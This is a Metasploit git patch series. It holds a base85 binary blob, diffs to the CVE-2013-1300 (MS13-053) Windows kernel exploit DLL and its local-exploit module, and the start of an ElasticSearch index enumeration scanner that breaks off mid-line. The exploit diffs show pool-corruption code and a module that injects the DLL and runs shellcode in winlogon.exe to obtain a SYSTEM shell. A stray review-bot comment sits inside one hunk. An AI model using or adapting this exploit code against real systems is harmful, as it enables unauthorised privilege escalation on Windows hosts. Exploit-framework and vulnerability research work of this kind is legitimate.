zlrX&%s_NVBxInsXu+=GHD=J?JBU|_>cEvArb%?!USICBTVX@F|5Lm3$zf|{U5{z@I zb7^2YJAz=p2wg;eAo3BCj*XOCpuXuub{892CI#jk=c=GrkPnfGPPVTcir%;HqceFM 
zrSzwF`QKpw3N=c%2u1AjJW2%y47{9C65R$%cM;A}H-`Ea6oaq*-8zGRayC1hsWbIuI#X{wCsUuuP6!L+tqf#uVc!GiIDIK=<xkQjfjPn3 zIKH-1pDdTz@wb`9eKWdU1Zz(4M*sVPdUkAXRYFD)Qv0Nye1}GY;$Y@-&ep)o`#z$! z;aqM9Jz%-*Lz37Atp6Wxwrud;DaGWuf-0xw6LiP$gQ?RI+K**oZU$Jh~OzOg9t%{#PME$W@EZOFuV|j$(mcIm zReU;=-$$=l6`4Y;qgw;8MRu??m_WA9>Es$Nc17k8Z&HCUMpL`c5+C(QjZgCG*WH(S zhStKJyfnLWaD&6)kJ=e#n(TV5_HR&RX33d>U$DZn@|$f9MsKr>8i^D^ZVk~BReYs-n&INyLR z4P-Q9sBIdx&WYA2UwHJc6RnZH0YkM&G2l+1q4JHc6RjM}9x4alUy#14T!qD_2*RUx z2KGJAqK!7%NO!Z}_5J2mBWf)#fs?iW#b90KAweUm!&gZyWLQt+y=u6lIt% zLC0`jc-epcQ0YdprKpXIU594qYJIgi=0|VVpGL?}TX*vT&xnO_H*JjcMKtb?+88Ae zxiL;4d}E?O7>5f7F54|}E11D{z~|-5?}67<>WJdiR4OEkkWWdXd@)4z0^E~;&LPpS zb;`S>ZrKN7g6&EFdEy&;V{~7`>DjeBr=R}cuEL3Ab|EIf?vbdIuaEec6FXh5k7JiV zLGoq<)5%fX^AXJMH!HeH23@6Y>j{;LTlG}zRjJskQn5E&PsLu9ioKEwzM~L$dBiKe zZ<19K@!_C~_$&U4m+jRfejZ3rL~*Yk`S`<>1d4El#2#&=W=xc< zY?fsI`HG0Bh}d6J8D<~1?&c0#$!>L7n&kMCdK4tnpVT8E`HokT?|d_m*oCq_(EhxX zKKcDkB9W*^`;;((p5GUT@>_CNMO)AFg&Cuy)Ni@=Mc-vfEi|@#801CLNcL-Coq927 z5vmw8rYuI(M{z$xYxFMe=UDzb+~fyGvPPWGfIK*dxZHFT>4;%a@HNx%q~y!FlCn)t z${XiM${Tv@gmunJik^_KmyXuxy?n5OY!77~a~RC0$d?d};a88ShGmF&Ml`lXihP1m zBAsBI$R?N=5=xZeGXncw5H<*L{_DOGl!O$K642L0KoJcQP}oTX6z&S_TlSu;!20-Z zi|~wpAUAp-;j2Tc_xUm|ZDrN7bWjoK#eLkHnIhctF`qU=oA#ijfjbm1iCRVdesQg~Dv)>i{)2FT~ z5Tt%!)0d{%zkrU3Nv|F3tFie_+kxGVkX;w7mvLoST!mJv&DW~58qLdZoK~!r^WzJ% zRW;dlWxo8Hs`=j9S`2t3jJ4ZY4*jK%DrRD6<;w}(#kPV$$ z7nmUCFKKa?f?L30VAM`6?lQ0r91aG-%R$>NE$#|22NS`JHZAT-a3gpXxb|f&t`5{* z(c+c>iQt`}8$1op0;QKV7o4W0XeNFZZKyUxOVSdx64F?u6=^=LOsmuuU{Z}<)IQX; znjgKG)ad$3RAR2)DJGwab)WEFe+>WaJ^mYSc=53c-xjb}L;S5K%=x@8F%aJq(br(> z*D5fT&};knZ20T=PxvdoEha@Zgj3n$yQE*!l)q+j#K?~#ZJr(( zu@avWiFJ|A8GX}k_>+8qA7N3iCzZ3bd)Z<;I zhh3)Ksi#JT+Z&p}&lathU%q~L!Ygv7PCz~j zacQLCT>hM^{;_K2p8U=v7ez`c;5}9D!inedNn$H;O4N*SE65R5_F_{+JcNg(%%y!8 zLflI6Nooi2Ps&Q_1_@2filBM$h}5ZKpQtV2ZQ&-dlUlXB=M7bofmiEnvYfi_voMI|kzNUg|$)GHOJB$rfv zNS!HfROmIp66}igluK+RKcsFDxmm3H(Ce4ji+rAo&;Kj(JCW1~SEyJ^d5hFZ`&LG+ z=>;Y3244s-NQ)>nt#CpK|3+(Iq)c&%kxxl_J_+xY>E$7H^%&}+`RHo&_T|g9NN;`$ 
z2YorGq~7%LwjW=lUKM^)|GjT!;eR=$RYbUz@aowz)?1&7z2v|6D!CxstJ?m)wWn(T z7U;eu=`JKCi}Ak(Geh2cTkI_DMncadcc5$Y* zEX&|9;lbVz67_~-+FAD5#8b6?S0cAVw0vE+fd3+VaN+~~B}z%$7^W)kmH!gjB1me; zO3kB(F^+s4hf4f2o;+eSU-w1Ywi05PsLjAkxJI=a6SQmjB_iSdQ;>_Rd3td*+5Cbm#d8m(i6>8~+%5#4o^>_NHSNBo#IiVi++~(4w{$3yTQ{lblzw4ux z{xg2bC{h1}j>t$2IUD(Z2B0ZYKS4U0>j>D5@^4s`2V( zcvM)5d2xZSX#S!}{-T;9E|&L(+$yW;s;ctBvI=hv@#%5j$8cs*nQvlM%~_5o6qT3H z!_Qi6LU~oK_bgjUn~G1bh4>@p{lW+tp5=#bIR@&1w$Z;d|EkW9-h zn^#j*vt(wex6+8rG_TKJQ;7>QbArF7hO7yBP*pR?T*1RMk`z zNyZxSE?81Aud2Lker{RiqL~usEN@AXzucEqUY=D}Lm^bvlzH{IWLNqt3YOIRycM}s zc}xQJ>7dmV98D+=6I zDwQVgYji`x;62?P@A_+Wm8M-^RH;q$&eQUWYP8Ji8gPkrJz-w&FV`~t3&_`M?Z){& zZA#T*Ez3J!+#{DuPspUBaZ#eGRXmX@k%zUbsPmKIp-p(j{8vIhkj9Pt(8mF$R?O&;&~RYzGH`IUt9gwS17BW7;fG+UdEV z%omk{(sQT=rH!uxW55P*DA)v^2d)NX8{k?n4qOk)ywXPS0&p{UA-DyM2U|c6ooa0$ zhhDXIQ0AKsftP|Epv*S~L78vr0%g9b8>Ek+Y459frzlY7o#MbmFaf+0Oax`#X$&|5 zG=U>QJ2(o=0Ivpfz|mkncnvrU{3bXTycR44$AZ;h5?BXb2R48yU=x@Mt_JPkTF?Qm z2c-wL5lja+gBjo!FcWM6CxC5W7T69>1P_6ezz%RS7zD2eyTBX3ZcyrS?T8k4BM=2j zJs$_o024r|Zxg|r!7-q4xCy))w1Z(VfEx@4bHE6&5R3$+{TKkwML!TM2M2+5U=+9< z91I@hlibnZYVd&!1`LA3z~i6`j5&%wU;-FMg*FC^1a06T zFasP6=7K}OSzruU3=RXUK^M3b45PwZ2}Xiz!9m~#a4@(T90G0yW570W7o4_I9 z7O@9+i2X?7A@*R0*n`K!9_$wTF~p}6doUgx0w#iCV~LNLgLW|ov&7tle2O_ZTg<^y zF}ER~Vh%QlIk-~H?c|r}!40B!lV73-w~9W4{1QEQP%w*l3g!?`!Cc}gn2($uBmb8o zr{FL!5wugsjMr2hP878C%)|=3i1)3YI2Xnw@#2ou@a4!06F-IQ>mZO)prVjizn2)*i36`TL3-!K$ z^bJ;{e+*m)eiz&bO55}l_*<|A{5fbMKc#KkgFXPx#lJz|Vf505m7; zuElzCEzjeey{=a zYr$^x6=3AYT3jO-M>uJM=rzpdZWyr-NIF_XXfA z^bdi>U?EryejjYX{z7mm`c>c|{7nIy(BB2NVIL2!K|cd*M}HBx9{o&k6Sx-K0GC;6_2*UknD(&jLHpUjiOSe-ju*y4;}l2_M!2V!)q*3E*OIB)AUj;=M~j6Z%^~ zJMp{TIcDYzM|1Gj)p;49!-a2ME(f5X6y=x2jcx4#cQg?>A@2mC#F z1bhNK4gLVs2=_7|{%=~`55Yum4%mXZ6&#EHPH+tA$^h-??*pYzZU=MFH-KH}9bh5) zWndKg;ow~Kw}RzhB}k<7u}dBL+t9b8PX?ExUkZ*vp9ro-KMzbme>u1g{ammOy$#%m z{$a2M{1!MD^U>fT^kv`?unOz~BS7uA7WWYMOwtXR!152%Ofi;^2mIvLP@>omAevsc0yz3xkfja^(=YR z?1hG{awlsn^2mIaJTiYJPi4qondz2C)~FOJ_cA{&kIVwdBP-YP)Z&A}+e0W^Nqvh8 
zh02}GV8~NOO62i}-jlJuJheUPQsI^BGZK_@D8413_{v(bJf)#=eG#*9@_0k>stEa8 zL{7-FDD{^gV_9@6CtH=sf{AGl*BU&weXe9)u=p_G>+G#9u@u) zKP4Z$dOWjr|Ao(z2z3VL!fT?I^a{U;pAt{uxg=anK`neI@ytUlyeI0L`Oih?3zfC- zqETMLk4d5}yh^&Ut#A zW!=>%7vXOSSJEy#E_2kvGs5Sh7QPZ*7q$2={4V)+c3Oo0jk24k$6tjj@?gY4WWrF3 zT=c3Hk4Zd5J`D2;y)2CQOF1faZJ&2VZY2Kl?tDGYlPF1%KPg8g3rd!ZwEAoa5Fjl@aCL+V}eS=wx= zbA`_&AC=4~_ey4zd8PiYAv2Pv`JpmXG0w-NFApghP;%Rs&nD<;RCTi|ZzU(HyvOVL z)weABx;N6FO?u=}>CD!7L9J=z=zJ<|jqtU|fl70xF1sqtD(_XAC+NIf8_IP_L*MXJ z{8So@u=Dj?GQ!T)OG<@ZpvOanof`^I@>_+W!k!e8P02Hr$ErRVABsl>?V2G0Mi^Oo znW`}I^pZEiP<4TXp~_u_A$vfKGF9=IrzRL}by(FBQI$SXJ7_J4zB&oX6|sVC03!isHZP_4q3{g(04k zxMb?(pxor@vTvka`qj!G#mUOe4f?v9a+4pDSMg^8a%F^-*{3|F>%6Dl9pA@&ejoFx zp|TWzRIQ=HEzoNerOpYJi@2FWtzpD1Uyr}BR+yuwOqCN(NW0YYvYX3@TM=n8)bpt0 z4Rx{J6H)Q>>b*v#E~7p(+$_|4H_CjG-h)xuiSNhAc4@G)!(npqkHqrx>aFfU#Nw4&ollWhxt0gS8W~by{tyw9x{2P5I+4<9} zmR_FfnpY>{NDFAV@%J&8onvAyZK&+b z6}9v~i_?dSh8w?=S3YK7GTwC#?4u z9`^Nq#{1_=(f^%U)LE%9eEz!lH4_|i7N_-h|MgPa>ncv`RV!6km@q=avU?hruekTy zP0jZOR<64LJFCC@!1vZX_|W&){@{l{TKD6JA6ftCV?WvO_!B?f_~g%izUddg{MF`P z|K_(({qE^!wmkdX^IL!a!nT&y?Jw?lY3HuC-7mkg=heNhweQ=1;NX9}{>Gs<-+KG- zAO84G$Gh*nf8L4BwRY|vf@8VPTDEXec|~Pa_3bsaKL6r7>XzJj%j`L~-ZuBE?Z36O{;s?K zyVL*Q9sa+Z|C!?_WMxmBlr#DI8*=le+?YRgT0!CT88c_ybhFC;ueSdmk^lcH`+art zz83rG^C7Z6Ie}RlnV*`@yv9iMJL*|)zt+T+{9OGsqF_qq6v4?;WKLdC*1*gort0Q? 
zHZ)r;}=Lbz2()ifqjZkKR&>A@)>0{K7Ubpp0}ck{lk?$UQw@U zdO8vl6Y*BNzN#{DS`|C>ujKrcuUu`*mtE6pYrZ(?_eez&4(aQ7;J}b=>V-;S=epRt| zc7@khR9jtMRpv`7sbQb|9aS}pW_#;=-kQpy^4Yaj{+jt-^ty}M+4C2BlPo5)HOXu> znP%6{FD);sAZxv4v!{8>y+yU&*=#wtTKd|ItFxz!t1gzg3VH4dk*?|Um!HfUC}o?k zme=~&C?(g2oDr2=MI>nGPh3j#(?@@>kNy3Zu@(;XwcpXlUd$7(>~DXz|My+3#Tj8e z)JJ``yHlfk-Lc22=N-8NtZ(@F*Z$-1;_Y8;f7HpD0jRHkebX!E&vWLzuYKQmw!7IY z1NF7vdRF{?;^}XHw*Lbs^tW$6>-}X}{q4_wKVnLMd->2=-}s~yDSI(vaMhEKXNS|h z;2-_vbi z9(^C`tBQ)fH5oQs zuGQV6;29ptyDgYSh#%_NA!e@WAKBSx47`<)Qev>URgP07wRTE1_GPxCG)<5X46 zgz}==THHU%X_gXo7D&$Zu*|VFyue#o96B?E{wXc1thTzyH@`Gw##`(AzlBM4C|u=L zc3q~H9#P1-xY}}>)X zaqz2xGgO=!^JZ%2NvcEV&{Si~F)VFC#N^s6?>zs41>Tx`vWr7%S_Ni3r_m;IuFqfN zHSDeo%dV70F2AabvwJn#7jmknk3L^Qk&{u`H8oZA4@%C?YyBkPzKA?dua%8o;`0_( z%`7YSPM~L@y)wX17FPAxYc1kKfv;ECXY2AL|n>UsE~{3*HlZVXQnpq%i&RmRz2VKqmx=v ztW~z_TnR#R13 zL9wUzs(MJl&aDSzJ(E zR;i~$8~o)|Xtxb0^ww0ARl>2MTxSk;Kw;0x(ppiI7n9W^2$OP}Pun1pkvSn>)9#fJZ_LgU z^>1}~$=Ca~ry_3j`>OpMvP3RawiB04k@Q!mSKh(#JuO8q@o8QqYj#~%z`0mWdnh8e z_w*xgy(D2MKZMsXc_2(bODg5ubB6S=lGe)Fs&cQy=A%A(vIKt-$(WZQm@%*nZ-If(bUR(^xIKvog2u4B) z&;V#CBx8-i&>$!ViVC5aiGBzqcF~YwC;rO2g0YbJ8wZKm`OpO+67wq|F{j(EyQ6B+ z^|Av*>|qT3ooONSf)Gk+ivO~cM#7dA0r95-N`$H**^fyjpvPa*A?_O>iSx1$-UCWn z8X>V?4v9bCg|2~Q&!y-eg(N;3APMiMkeELMNt*UTV*dst_6cN)li>_Z4ss;A_yo9>=(^e3aiz27JZy zuZR6V$cL|It6zL5cXUh{{*8hg6L`U%?z0>(>9D|NH+3V}ylAMkQVp7AK#h zpL@@ed#((X%M+_(PZt)C<+>o5It?YRDAgz$G?(|u;h z{nNOA?Xe?|4b%SgSnx49VbTBT@&B$z^*5%{z)yYa*0&P1+umCEmZiUAbjuDL`eVnZ z%!%G*ys4Z>-97Vl3#-Oy=B z+s7F-C<=;!IKUMb4-JRLKqg4s+rbPd2g-+LL&Z=vv=nN9mP4zd4Uo|uZAQHXYJu9I zcIXh)0R^FMC~80FnxL^z29ysKL*qMFM{)@fPzn_2Sz}L-zv-!oC zgBPA2hbJ*$4!rr#=ht^(fs1vuoaH Zrgp?{WeiQ`jFWY`#N=9PW!@sM( zcH=Kz`f*uC`<%~5{b|_!H(uJ=m~s09^_OKAd}rA`&t`0M z|Hl)rotb<^-Sz_+RXaOY9&Ok?>ACN1%-p(S(e%-dRVS-EmX6>0hx`Bd>5o6_yz6IE zCp`MW;`jG_a?N$imtCDTChn4-b^kK%{g-x}%If^-!M~mCeE0f0AABv_yJy#T&wJvR z>o0x(CliNyFNyIlyVt*XcTV1{@kf68J%=lK%WwWtkoVI+%}IM{jw|r+12>Je!OtG-{@dtnkG0MDLqlcm?jL>yl^oeVpDNJ7W2y z%O-7l>8Bs1XFTzAS^2L9{66*G&U9 
z(;msX>6y5(qb46oO0nHo@XNi6Mt$d|$PF!j++P1#aOdR@|GDYrncsD9%Wu3YVag5O zd7n3a=T`&Q)SrJO>5q@>-QO1ZhbIo5YqZ=Thu%Z7)S#Jq)KV1xe!g}Na91{Np@#mi zgz4=p+4?1Oxd%qpl;>uIY4vAUW|+Iv>nh3<7jsJ-)39ly&Erg?6TLEf&NXalqo)^6 zOtOzoto1QpTU1_E=}jBG#9KQ$-7|EEn>7Y*$|_%yhzFImX`{JE&dJ&nx9Qa;Rg}%I zsj96i@g>c#s&E$7R*YM09-YWMe_4sQ);FVXXn2*F==Rn4YxV2MLcU$~PkggprN76U zwch!Dre2qX^qACmZ|4#+pSL)_rfe}2i3_~7J(hi~v+HIPE-kQ;g{<6&Za#MHO=#rxHTJPw@>w5fgU-#9axUcIMC--$diQ{$mbw<9S>0gNF z*3s`8Nx99mt+PFE+iyE+``8wdd};F4$`R- zl&4Z&NjZ@6r39nL>GGhJ1#Bd$)@ z7p@ey+dbZ$8h=Pq+syYFz{~Seq^mq?n?ef%Jh^uDNm%dq#RE< zl`4z)I+J)==oS}Z?^x?zR~`+y~}>WKF;BE-0Ap%W3S_=W1Q3GbU9Z$ z+njGZ$GT>_mbxBu{l>M+wa@j2>kqE?U6b6o?!#%FX;*p1k>D zC$-n4+tV}Cr=-`XuSkC={pIv7NjCz&2i}M@#gg)?O(`aiDa%w~nq!)8sxd7!-D6r~ zdf2qVw9WJyInZJ1HbtAyH(z4D+&tPm)@(65&FSWBbDnvcd6s#u*=t^8t~J-0?=s(O z4w%1d{(<>n^9J)K^RLa%n75gCm|r&UH@{*2gZWS956xZXZt^d}5^agITx_}AGQx6= z#cWBjxGY(g$>iot%WTU$%R)<)#c!#%++%67tR`oFWci6@qve;Dr!CK0S}nURdo2eo zhb`|~{%rZH<+$aPCEPm5I@EfRb(l5LI>wr0wOU=)4C_Se6l(#cQDiN#F0%TpORRTW zzfIZv$oiypv-S7Zoz_mPW*crxvn{oK*S6923tOA*Rixy+Ho`|UFw-*-Ib*yt#6E^^j8 ze+1wE&NpR4x}AQdpGR^I6U8Tv&Zkb+w+lUbozDa8R@?CZ>4`X{YUAa zq<@+&9l{+Hsb(5vy23QhWH)8Q#kZM$1LvMGRax$}ykI#%UVUh}$hyw@lJy9Tj*Keu1$FgXew#g2uJ#g2O& zD;+-~g}-rZLArN3_Bi%C-g0y}K5%^GIO+JpG0++7ywd4#raN<-Q=GG$^PNvPUvR$R zobLL$%j;h2&P{tDZ6oQKKuVT*R;K?p{nhlh(vPP9P53cirD1?6-gKF1tjS3l3Qf0~ zmYaTO+HQKq^jFhxvq+r9Qf66(lpV0VV;O0kL~35K{>3`e)?js%l;Vhw#mNP{uFiBC`X24 zk|WoV?S{ab}USTxY)XIoB2LN8ImZZ_O_u0Y}ZBnTJ}gfZy}saUUhK*5Xci zH02j5qf*mTbEshhsSl(+Oa1yv>YJ(i?C($$gi!(yIv#dB;b?KZLoB{Sjw$WTeravnYKFHR@+Y79$Sa)nC;Hw%Tt^w%TrdTJd^TjN=Hg~>fqGr zsb#6ZNPRjr1Ah0~&vRty-0+;^RY#b}e%~==zasy(<^aKAiR* z{M(uKaoXS0KGW;z!JhLx@ty=~>#ICtJYzi;Pl{)f=LJtkdQkGPfqn(B+I*E|oMo$J zhozm8USz$;`mEJto0fcYa(L>R)b*+3>?!u~_Nn$i*pE|JKJBo9XAt;VIcEXHr}2ZAey1dSm*})1Q?v*ULEy&Tg3-so#HM z{<(Rx`6=@j^SkCjmQj|m78CWn-Qu=nP($Td9-z$DS=L)NScXvFn5?N*H#JR`)ocBZ zwbj~Y-D7RH9<&~^9;WU;VjX9*+3YsAEyMP7a*2JA>m}D8U4L<%=bq^PiCf#O*5BSq zx!7@~!|a$(jy~WZA}wky%x1Qm-R2B)E^SXCwdrQ_5%V$gar0?&q$S1@Zy9bGN$hOI 
zEX$H>DWu*krX})OmRgouR$A6r+S2!=x2GRW*Vy5OH zC3bFGmMxcBV79H;R&MiA6E3%{w5_4fu)(&;_7q&P1Fkq|J8U}wXB@YkwnZk#B*!NY zPac^(HrbZ!PR>fsO)jK2QJh?!>`PvnygYej@|xsz$s3Y4B|nwCHF-z!p5%kchm(&a zA4@)-d^$NYB_<_4Wq8U+>KR*#J0&Y6H>EITc1m$dd5SM(DSWpwWlhSulnp7H=#Oko z*^#m*PmQI zUFrsEfT!rK>`2{{dNB2H>XFoAsmD`Kr$*Xi?D6*D_L26nb{lm<7WF})eYU;WUT*i< zm)e)xSJJ0hXWu~G@RWV4eTRLI{h4tI|4mXmJOPw*B zTC&{Xb1Zc%rySQf);TsfHqj5->exX|d62r~2=&Nu$7$px#u@J%?i}eHOUv%2R>^f1 zI%hkJo#jrSbE$K=bER{QbDeX8bCdHa=T>@8dz=TIhn+{9$DGHV?B;Vtxws4tSsUXr zx$LeCSB@*+HOn=ZTA7NJIWpB zPH-o>$GA;yyE}uvSiXCfd#<~bo>-l`!QJFuO?|!Iz0tkdy~W+)ZgaQ054k(sK_t4{ zt))e!#ib?CR*gwBrPpdGin>|}R zEuJ<{yXTOn!xQv$dAdDXdQ^HG{kTN>aVGjU8T94y(`Tj6O)pKaPOnREpvGIBzBYY* z`o{Fl>08oU(%X=OL+KsVFkR{0=~@T%3u303qD*n71o}T?*eq-}WtehI`KDR)|4L2O zraDuDsmZk3w3garBQ?nuYLPZmyWSfLn!4x_Y33+%oH@aqXdYuWA*&hY93)lxL#5_w zdP5E7Ci80ZTJw7IMr3!3xy9UOZZ{t?cbJ2EFG#aQ(FaPfXkGNviB7kBEcua;ZX->z zNXK$gu!*?q^&%r+6K*1j^B8(+ImEGvc(s{=rsJkK!p|qn)r8Yd9noc$nece}cU|<3 zx-F+Inl;iIWsR}MS>vr)sl6@WZ2MgJz7)={hWG2>{s#EJ2?8)*}Z-E4c+} zXh9y@kcf6<;t*2Nfm{TUj4mWYb3{6#kd8RyBLN9XL`KFSB_`y=j-+HDD>9WW4u=;< g!i{6$M;rW@1xMz>lZ9~QY(@;F@S_y?|E}l%0J?w*#sB~S literal 0 HcmV?d00001 diff --git a/external/source/exploits/cve-2013-1300/cve-2013-1300.sln b/external/source/exploits/cve-2013-1300/cve-2013-1300.sln index 87426cc08c..c1eb1c9cdc 100755 --- a/external/source/exploits/cve-2013-1300/cve-2013-1300.sln +++ b/external/source/exploits/cve-2013-1300/cve-2013-1300.sln 
@@ -1,7 +1,9 @@  -Microsoft Visual Studio Solution File, Format Version 11.00 -# Visual Studio 2010 -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2013-1300", "cve-2013-1300\cve-2013-1300.vcxproj", "{C093C490-61BF-433E-AEB4-80753B20DEC7}" +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 2013 +VisualStudioVersion = 12.0.21005.1 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "schlamperei", "schlamperei\schlamperei.vcxproj", "{C093C490-61BF-433E-AEB4-80753B20DEC7}" EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution diff --git a/external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.cpp b/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.c old mode 100644 new mode 100755 similarity index 91% rename from external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.cpp rename to external/source/exploits/cve-2013-1300/schlamperei/schlamperei.c index f87ad889ae..9b08be0379 --- a/external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.cpp +++ b/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.c @@ -1,10 +1,9 @@ -/* dllmain.cpp.cpp - * Exploit for CVE-2013-1300 aka ms13-053 - * Tested on Windows 7 32-bit - * - * used in pwn2own 2013 to break out of chrome's sandbox - * - * found and exploited by nils and jon of @mwrlabs +/*! + * @file dllmain.cpp + * @brief Exploit for CVE-2013-1300 aka ms13-053 + * @detail Tested on Windows 7 32-bit. + * Used in pwn2own 2013 to break out of chrome's sandbox. + * Found and exploited by nils and jon of @mwrlabs. */ #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR @@ -27,6 +26,8 @@ typedef NTSTATUS *PNTSTATUS; #define TABLE_BASE 0xff910000 +#define EXPLOIT_MSG 0xd + // global variables FTW HWND gHwnd = 0x0; unsigned int gEPROCESS = 0x0; 
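Review bot: The new Doxygen header in the `@@ -1,10 +1,9 @@` hunk still says `@file dllmain.cpp`, although this diff renames the source to `schlamperei.c`, so generated documentation would attribute the block to a file that does not exist. It also uses `@detail`, whereas the Doxygen command is `@details`. Suggested header lines: `@file schlamperei.c` and `@details Tested on Windows 7 32-bit.`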
@@ -132,7 +133,7 @@ BOOL AllocFakeEProcess(DWORD address) { addr += 0x10000; } - if(res!=0) return false; + if(res!=0) return FALSE; memset((void*)addr, 0xab, 0x4000); UINT *eprocess = (UINT*)addr+o; UINT *before = (UINT*)addr; @@ -152,11 +153,11 @@ BOOL AllocFakeEProcess(DWORD address) { //for(x=0; x<100; x++) second[x] = (0xbeef<<16) + (0xbb00 | x); //second[0x20] = 0x2; //second[0x30] = 0x1; - return true; + return TRUE; } DWORD wndproc(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam) { - if(msg == 0xd) { + if(msg == EXPLOIT_MSG) { // triggering the exploit through WM_GETTEXT // printf("[-] WM_GETTEXT message\n"); unsigned char payload[] = "ABCDE "; @@ -257,7 +258,7 @@ int Schlamperei(LPVOID shellcode) // so we will copy in 8*2 bytes = 16 bytes to corrupt the pool pointer unsigned char *buf = (unsigned char *)malloc(16); for(int i=0; i<0x40; i++) { - NtUserMessageCall(gHwnd, 0xd, 0x8, (LPARAM)buf, 0x0, 0x2b3, 0x10); + NtUserMessageCall(gHwnd, EXPLOIT_MSG, 0x8, (LPARAM)buf, 0x0, 0x2b3, 0x10); } SendMessage(wnd, 0x401, addressofwnd, 0x0); @@ -277,7 +278,6 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) { } break; case DLL_PROCESS_ATTACH: - hAppInstance = hinstDLL; Schlamperei(lpReserved); break; case DLL_PROCESS_DETACH: diff --git a/external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.vcxproj b/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.vcxproj similarity index 80% rename from external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.vcxproj rename to external/source/exploits/cve-2013-1300/schlamperei/schlamperei.vcxproj index 93f23165d9..2a78c73931 100755 --- a/external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.vcxproj +++ b/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.vcxproj @@ -1,5 +1,5 @@ - - + + Debug 
@@ -13,19 +13,21 @@ {C093C490-61BF-433E-AEB4-80753B20DEC7} Win32Proj - Schlamperei_DLL + schlamperei DynamicLibrary true Unicode + v120 DynamicLibrary false true Unicode + v120 @@ -40,10 +42,16 @@ ../../../ReflectiveDLLInjection/common;$(IncludePath) false + $(Configuration)\$(Platform)\ + $(Configuration)\$(Platform)\ + $(ProjectName).$(PlatformShortName) ../../../ReflectiveDLLInjection/common;$(IncludePath) false + $(Configuration)\$(Platform)\ + $(Configuration)\$(Platform)\ + $(ProjectName).$(PlatformShortName) @@ -73,9 +81,16 @@ true true + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF EXIST "..\..\..\..\..\data\exploits\cve-2013-1300\" GOTO COPY + mkdir "..\..\..\..\..\data\exploits\cve-2013-1300\" +:COPY +copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\cve-2013-1300\" + - + false NotUsing false diff --git a/modules/exploits/windows/local/ms13_053_schlamperei.rb b/modules/exploits/windows/local/ms13_053_schlamperei.rb index cc072c3a6c..1b8916b7b6 100644 --- a/modules/exploits/windows/local/ms13_053_schlamperei.rb +++ b/modules/exploits/windows/local/ms13_053_schlamperei.rb @@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Local The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox. - NOTE: when you exit the meterpreter session, winlogon.exe is lickely to crash. + NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash. }, 'License' => MSF_LICENSE, 'Author' => 
@@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Local end print_status("Reflectively injecting the exploit DLL into #{process.pid}...") - library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-1300", "cve-2013-1300.dll") + library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-1300", "schlamperei.x86.dll") library_path = ::File.expand_path(library_path) print_status("Injecting exploit into #{process.pid}...") @@ -120,16 +120,17 @@ class Metasploit3 < Msf::Exploit::Local thread = process.thread.create(exploit_mem + offset) client.railgun.kernel32.WaitForSingleObject(thread.handle, 5000) - client.sys.process.each_process do |p| if p['name'] == "winlogon.exe" winlogon_pid = p['pid'] print_status("Found winlogon.exe with PID #{winlogon_pid}") - if execute_shellcode(payload.encoded, nil, winlogon_pid) - print_good("Everything seems to have worked, cross your fingers and wait for a SYSTEM shell") - else - print_error("Failed to start payload thread") + + if execute_shellcode(payload.encoded, nil, winlogon_pid) + print_good("Everything seems to have worked, cross your fingers and wait for a SYSTEM shell") + else + print_error("Failed to start payload thread") end + break end end From b032f2c2700f02ec1d7e1e4c9c49ce697118f2d9 Mon Sep 17 00:00:00 2001 From: Silas Cutler Date: Mon, 17 Mar 2014 13:31:24 -0400 Subject: [PATCH 063/853] Added Elastic Search Enum --- .../scanner/elasticsearch/es_enum.rb | 73 +++++++++++++++++++ 1 file changed, 73 insertions(+) create mode 100644 modules/auxiliary/scanner/elasticsearch/es_enum.rb diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb new file mode 100644 index 0000000000..ed41a17cc2 --- /dev/null +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb 
@@ -0,0 +1,73 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +require 'msf/core' + + +class Metasploit3 < Msf::Auxiliary + + # Exploit mixins should be called first + include Msf::Exploit::Remote::HttpClient + # Scanner mixin should be near last + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => 'ElasticSearch Enum Utility', + 'Description' => 'Send a request to enumerate ElasticSearch indices', + 'Author' => ['Silas Cutler MSF_LICENSE + ) + register_options( + [ + Opt::RPORT(9200) + ] + ) + + end + + def run_host(target_host) + + begin + res = send_request_raw({ + 'uri' => '/_aliases', + 'method' => 'GET', + 'version' => '1.0', + }, 10) + + if res.nil? + print_error("No response for #{target_host}") + return nil + end + + begin + temp = JSON.parse(res.body) + rescue JSON::ParserError + print_error("Unable to parse JSON") + return + end + + + if (res.code == 200) + temp.each do |index| + print_good("Index : " + index[0]) + end + end + + if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0 + path = store_loot("couchdb.enum.file", "text/plain", rhost, 